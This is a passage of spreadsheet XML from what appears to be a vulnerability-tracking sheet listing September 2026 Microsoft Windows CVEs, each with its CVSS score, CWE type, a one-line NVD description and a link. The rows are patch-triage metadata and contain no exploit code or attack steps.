      <c r="E832" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F832" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G832" s="5" t="inlineStr"/>
      <c r="H832" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I832" s="5" t="inlineStr"/>
      <c r="J832" s="5" t="inlineStr"/>
      <c r="K832" s="5" t="inlineStr"/>
      <c r="L832" s="5" t="inlineStr"/>
      <c r="M832" s="5" t="inlineStr"/>
      <c r="N832" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O832" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P832" s="5" t="inlineStr"/>
      <c r="Q832" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R832" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Shell allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S832" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69392</t>
        </is>
      </c>
    </row>
    <row r="833">
      <c r="A833" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B833" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C833" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69407</t>
        </is>
      </c>
      <c r="D833" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E833" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F833" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G833" s="5" t="inlineStr"/>
      <c r="H833" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I833" s="5" t="inlineStr"/>
      <c r="J833" s="5" t="inlineStr"/>
      <c r="K833" s="5" t="inlineStr"/>
      <c r="L833" s="5" t="inlineStr"/>
      <c r="M833" s="5" t="inlineStr"/>
      <c r="N833" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O833" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P833" s="5" t="inlineStr"/>
      <c r="Q833" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R833" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Volume Manager Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S833" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69407</t>
        </is>
      </c>
    </row>
    <row r="834">
      <c r="A834" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B834" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C834" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69420</t>
        </is>
      </c>
      <c r="D834" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E834" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F834" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G834" s="5" t="inlineStr"/>
      <c r="H834" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I834" s="5" t="inlineStr"/>
      <c r="J834" s="5" t="inlineStr"/>
      <c r="K834" s="5" t="inlineStr"/>
      <c r="L834" s="5" t="inlineStr"/>
      <c r="M834" s="5" t="inlineStr"/>
      <c r="N834" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O834" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P834" s="5" t="inlineStr"/>
      <c r="Q834" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R834" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows VOLSNAP.SYS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S834" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69420</t>
        </is>
      </c>
    </row>
    <row r="835">
      <c r="A835" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B835" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C835" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69421</t>
        </is>
      </c>
      <c r="D835" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E835" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F835" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G835" s="5" t="inlineStr"/>
      <c r="H835" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I835" s="5" t="inlineStr"/>
      <c r="J835" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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35" s="5" t="inlineStr"/>
      <c r="M835" s="5" t="inlineStr"/>
      <c r="N835" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O835" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P835" s="5" t="inlineStr"/>
      <c r="Q835" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="R835" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows Kernel Mode Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S835" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69421</t>
        </is>
      </c>
    </row>
    <row r="836">
      <c r="A836" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B836" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C836" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69424</t>
        </is>
      </c>
      <c r="D836" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E836" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F836" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G836" s="5" t="inlineStr"/>
      <c r="H836" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I836" s="5" t="inlineStr"/>
      <c r="J836" s="5" t="inlineStr"/>
      <c r="K836" s="5" t="inlineStr"/>
      <c r="L836" s="5" t="inlineStr"/>
      <c r="M836" s="5" t="inlineStr"/>
      <c r="N836" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O836" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P836" s="5" t="inlineStr"/>
      <c r="Q836" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R836" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Distributed File System (DFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S836" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69424</t>
        </is>
      </c>
    </row>
    <row r="837">
      <c r="A837" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B837" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C837" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69426</t>
        </is>
      </c>
      <c r="D837" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E837" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F837" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G837" s="5" t="inlineStr"/>
      <c r="H837" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I837" s="5" t="inlineStr"/>
      <c r="J837" s="5" t="inlineStr"/>
      <c r="K837" s="5" t="inlineStr"/>
      <c r="L837" s="5" t="inlineStr"/>
      <c r="M837" s="5" t="inlineStr"/>
      <c r="N837" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O837" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P837" s="5" t="inlineStr"/>
      <c r="Q837" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R837" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows VOLSNAP.SYS allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S837" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69426</t>
        </is>
      </c>
    </row>
    <row r="838">
      <c r="A838" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B838" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C838" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69432</t>
        </is>
      </c>
      <c r="D838" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E838" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F838" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G838" s="5" t="inlineStr"/>
      <c r="H838" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I838" s="5" t="inlineStr"/>
      <c r="J838" s="5" t="inlineStr"/>
      <c r="K838" s="5" t="inlineStr"/>
      <c r="L838" s="5" t="inlineStr"/>
      <c r="M838" s="5" t="inlineStr"/>
      <c r="N838" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O838" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P838" s="5" t="inlineStr"/>
      <c r="Q838" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R838" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Volume Manager Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S838" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69432</t>
        </is>
      </c>
    </row>
    <row r="839">
      <c r="A839" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B839" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C839" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69433</t>
        </is>
      </c>
      <c r="D839" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E839" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F839" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G839" s="5" t="inlineStr"/>
      <c r="H839" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I839" s="5" t="inlineStr"/>
      <c r="J839" s="5" t="inlineStr"/>
      <c r="K839" s="5" t="inlineStr"/>
      <c r="L839" s="5" t="inlineStr"/>
      <c r="M839" s="5" t="inlineStr"/>
      <c r="N839" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O839" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P839" s="5" t="inlineStr"/>
      <c r="Q839" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R839" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S839" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69433</t>
        </is>
      </c>
    </row>
    <row r="840">
      <c r="A840" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B840" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C840" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69436</t>
        </is>
      </c>
      <c r="D840" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E840" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F840" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G840" s="5" t="inlineStr"/>
      <c r="H840" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I840" s="5" t="inlineStr"/>
      <c r="J840" s="5" t="inlineStr"/>
      <c r="K840" s="5" t="inlineStr"/>
      <c r="L840" s="5" t="inlineStr"/>
      <c r="M840" s="5" t="inlineStr"/>
      <c r="N840" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O840" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P840" s="5" t="inlineStr"/>
      <c r="Q840" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R840" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S840" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69436</t>
        </is>
      </c>
    </row>
    <row r="841">
      <c r="A841" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B841" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C841" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69444</t>
        </is>
      </c>
      <c r="D841" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E841" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F841" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G841" s="5" t="inlineStr"/>
      <c r="H841" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I841" s="5" t="inlineStr"/>
      <c r="J841" s="5" t="inlineStr"/>
      <c r="K841" s="5" t="inlineStr"/>
      <c r="L841" s="5" t="inlineStr"/>
      <c r="M841" s="5" t="inlineStr"/>
      <c r="N841" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O841" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P841" s="5" t="inlineStr"/>
      <c r="Q841" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R841" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Speech allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S841" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69444</t>
        </is>
      </c>
    </row>
    <row r="842">
      <c r="A842" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B842" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C842" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69445</t>
        </is>
      </c>
      <c r="D842" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E842" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F842" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G842" s="5" t="inlineStr"/>
      <c r="H842" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I842" s="5" t="inlineStr"/>
      <c r="J842" s="5" t="inlineStr"/>
      <c r="K842" s="5" t="inlineStr"/>
      <c r="L842" s="5" t="inlineStr"/>
      <c r="M842" s="5" t="inlineStr"/>
      <c r="N842" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O842" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P842" s="5" t="inlineStr"/>
      <c r="Q842" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R842" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows Compressed Folder allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S842" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69445</t>
        </is>
      </c>
    </row>
    <row r="843">
      <c r="A843" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B843" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C843" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69447</t>
        </is>
      </c>
      <c r="D843" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E843" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F843" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G843" s="5" t="inlineStr"/>
      <c r="H843" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I843" s="5" t="inlineStr"/>
      <c r="J843" s="5" t="inlineStr"/>
      <c r="K843" s="5" t="inlineStr"/>
      <c r="L843" s="5" t="inlineStr"/>
      <c r="M843" s="5" t="inlineStr"/>
      <c r="N843" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O843" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P843" s="5" t="inlineStr"/>
      <c r="Q843" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R843" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S843" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69447</t>
        </is>
      </c>
    </row>
    <row r="844">
      <c r="A844" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B844" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C844" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69450</t>
        </is>
      </c>
      <c r="D844" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E844" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F844" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G844" s="5" t="inlineStr"/>
      <c r="H844" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I844" s="5" t="inlineStr"/>
      <c r="J844" s="5" t="inlineStr"/>
      <c r="K844" s="5" t="inlineStr"/>
      <c r="L844" s="5" t="inlineStr"/>
      <c r="M844" s="5" t="inlineStr"/>
      <c r="N844" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O844" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P844" s="5" t="inlineStr"/>
      <c r="Q844" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R844" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S844" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69450</t>
        </is>
      </c>
    </row>
    <row r="845">
      <c r="A845" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B845" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C845" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69455</t>
        </is>
      </c>
      <c r="D845" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E845" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F845" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G845" s="5" t="inlineStr"/>
      <c r="H845" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I845" s="5" t="inlineStr"/>
      <c r="J845" s="5" t="inlineStr"/>
      <c r="K845" s="5" t="inlineStr"/>
      <c r="L845" s="5" t="inlineStr"/>
      <c r="M845" s="5" t="inlineStr"/>
      <c r="N845" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O845" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P845" s="5" t="inlineStr"/>
      <c r="Q845" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R845" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S845" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69455</t>
        </is>
      </c>
    </row>
    <row r="846">
      <c r="A846" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B846" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C846" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69456</t>
        </is>
      </c>
      <c r="D846" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E846" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F846" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G846" s="5" t="inlineStr"/>
      <c r="H846" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I846" s="5" t="inlineStr"/>
      <c r="J846" s="5" t="inlineStr"/>
      <c r="K846" s="5" t="inlineStr"/>
      <c r="L846" s="5" t="inlineStr"/>
      <c r="M846" s="5" t="inlineStr"/>
      <c r="N846" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O846" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P846" s="5" t="inlineStr"/>
      <c r="Q846" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R846" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Speech allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S846" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69456</t>
        </is>
      </c>
    </row>
    <row r="847">
      <c r="A847" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B847" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C847" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69459</t>
        </is>
      </c>
      <c r="D847" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E847" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F847" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G847" s="5" t="inlineStr"/>
      <c r="H847" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I847" s="5" t="inlineStr"/>
      <c r="J847" s="5" t="inlineStr"/>
      <c r="K847" s="5" t="inlineStr"/>
      <c r="L847" s="5" t="inlineStr"/>
      <c r="M847" s="5" t="inlineStr"/>
      <c r="N847" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O847" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P847" s="5" t="inlineStr"/>
      <c r="Q847" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R847" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Power Dependency Coordinator allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S847" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69459</t>
        </is>
      </c>
    </row>
    <row r="848">
      <c r="A848" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B848" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C848" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69467</t>
        </is>
      </c>
      <c r="D848" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E848" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F848" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G848" s="5" t="inlineStr"/>
      <c r="H848" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I848" s="5" t="inlineStr"/>
      <c r="J848" s="5" t="inlineStr"/>
      <c r="K848" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="L848" s="5" t="inlineStr"/>
      <c r="M848" s="5" t="inlineStr"/>
      <c r="N848" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O848" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P848" s="5" t="inlineStr"/>
      <c r="Q848" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R848" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S848" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69467</t>
        </is>
      </c>
    </row>
    <row r="849">
      <c r="A849" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B849" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C849" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69475</t>
        </is>
      </c>
      <c r="D849" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E849" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F849" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G849" s="5" t="inlineStr"/>
      <c r="H849" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I849" s="5" t="inlineStr"/>
      <c r="J849" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K84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9" s="5" t="inlineStr"/>
      <c r="M849" s="5" t="inlineStr"/>
      <c r="N849" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O849" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P849" s="5" t="inlineStr"/>
      <c r="Q849" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="R849" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Remote Desktop Services allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S849" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69475</t>
        </is>
      </c>
    </row>
    <row r="850">
      <c r="A850" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B850" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C850" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69476</t>
        </is>
      </c>
      <c r="D850" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E850" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F850" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G850" s="5" t="inlineStr"/>
      <c r="H850" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I850" s="5" t="inlineStr"/>
      <c r="J850" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K85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50" s="5" t="inlineStr"/>
      <c r="M850" s="5" t="inlineStr"/>
      <c r="N850" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O850" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P850" s="5" t="inlineStr"/>
      <c r="Q850" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R850" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S850" s="6" t="inlineStr">
